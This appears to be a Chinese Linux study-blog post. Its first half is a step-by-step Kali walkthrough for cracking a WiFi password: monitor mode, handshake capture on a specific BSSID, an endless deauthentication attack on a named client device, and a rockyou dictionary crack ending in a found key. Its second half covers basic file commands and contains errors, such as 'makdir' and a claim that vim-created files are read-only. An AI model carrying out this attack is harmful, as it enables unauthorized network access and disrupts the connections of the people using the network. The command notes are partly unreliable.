LINUX第2天——基础操作

文章目录

  • 1. kali破解wifi密码
    • 第一步
    • 第二步
    • 第三步
    • 第四步
    • 第五步
    • 第六步
    • 第七步
    • 第八步
    • 第九步
  • 2. linux命令的基础操作
    • 2.1 创建文件
    • 2.2 创建文件夹
    • 2.3 删除文件
    • 2.4 移动文件
    • 2.5 复制文件
    • 2.6 跳转,显示详情
    • 2.7 vim输入

1. kali破解wifi密码

第一步

插入无线网卡,连接到虚拟机。

ifconfig
  • 看是否出现wlan0

第二步

airmon-ng start wlan0
  • 开启网卡监听模式

第三步

iwconfig
  • 检验,出现wlan0mon则成功

第四步

airodump-ng wlan0mon
  • 扫描
  • BSSID为wifi的MAC地址
  • PWR为信号强弱程度,数值越小信号越强
  • DATA为数据量,越大使用的人就越多
  • CH为信道频率(频道)
  • ESSID为wifi的名称,中文可能会有乱码

第五步

airodump-ng -c 1 -w /home/cbb/桌面/实战项目/实战2-破解wifi密码/test --bssid 7A:F5:8D:B4:BA:B2 wlan0mon
  • airodump-ng -c -w <抓取握手包后存放位置名称> --bssid

第六步

  • 解除认证攻击
  • 保持命令窗口处于运行状态,再打开一个新的命令窗口,进行解除认证攻击,即强制连接到目的wifi路由的设备重新连接。
aireplay-ng -0 0 -a 7A:F5:8D:B4:BA:B2 -c 04:6c:59:97:F4:D2 wlan0mon
  • aireplay-ng -<攻击模式,这里使用持续攻击(0)> [攻击次数,0为无限攻击] -a -c <被攻击设备的MAC地址>

  • 带破解的wifi的mac : 7A:F5:8D:B4:BA:B2

  • 用这个wifi的用户 : 04:6c:59:97:F4:D2

  • 出现 : WPA handshake成功

第七步

airmon-ng stop wlan0mon
  • 关闭监听

第八步

gzip -d /usr/share/wordlists/rockyou.txt.gz
  • 解压字典

第九步

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 7A:F5:8D:B4:BA:B2 test-01.cap
  • aircrack-ng -w <指定字典> -b <目的路由MAC地址> <抓到的握手包>
    爆破
 KEY FOUND! [ 12345678 ]

2. linux命令的基础操作

2.1 创建文件

  1. 法一:
touch test.txt
  1. 法二:
vi test.txt 或 vim test.txt
  • 这样创建的文件,只可读。
  • 或者只可以用vim来编辑
  • vim输入在后面讲。
  1. 法3:
echo > test.txt
  • echo xxx内容 > test.txt
  • 这样可以直接输入内容。

2.2 创建文件夹

makdir abc

2.3 删除文件

rm -f test.txt
  • rm就是删除的意思。
  • -f意思是删除不提醒。

2.4 移动文件

mv test.txt abc
  • mv 待移动的文件或文件夹 移到的目的文件夹

2.5 复制文件

  • 把mv 改成 cp

2.6 跳转,显示详情

  • 跳转到home文件夹
cd /home
  • 显示home文件夹里面的内容
ls

2.7 vim输入

  • 按 “ i ” 进入编辑模式。
  • 英文状态下,按 Esc ,在输入 “:wq” 保存退出。

你可能感兴趣的:(Linux学习,linux,安全)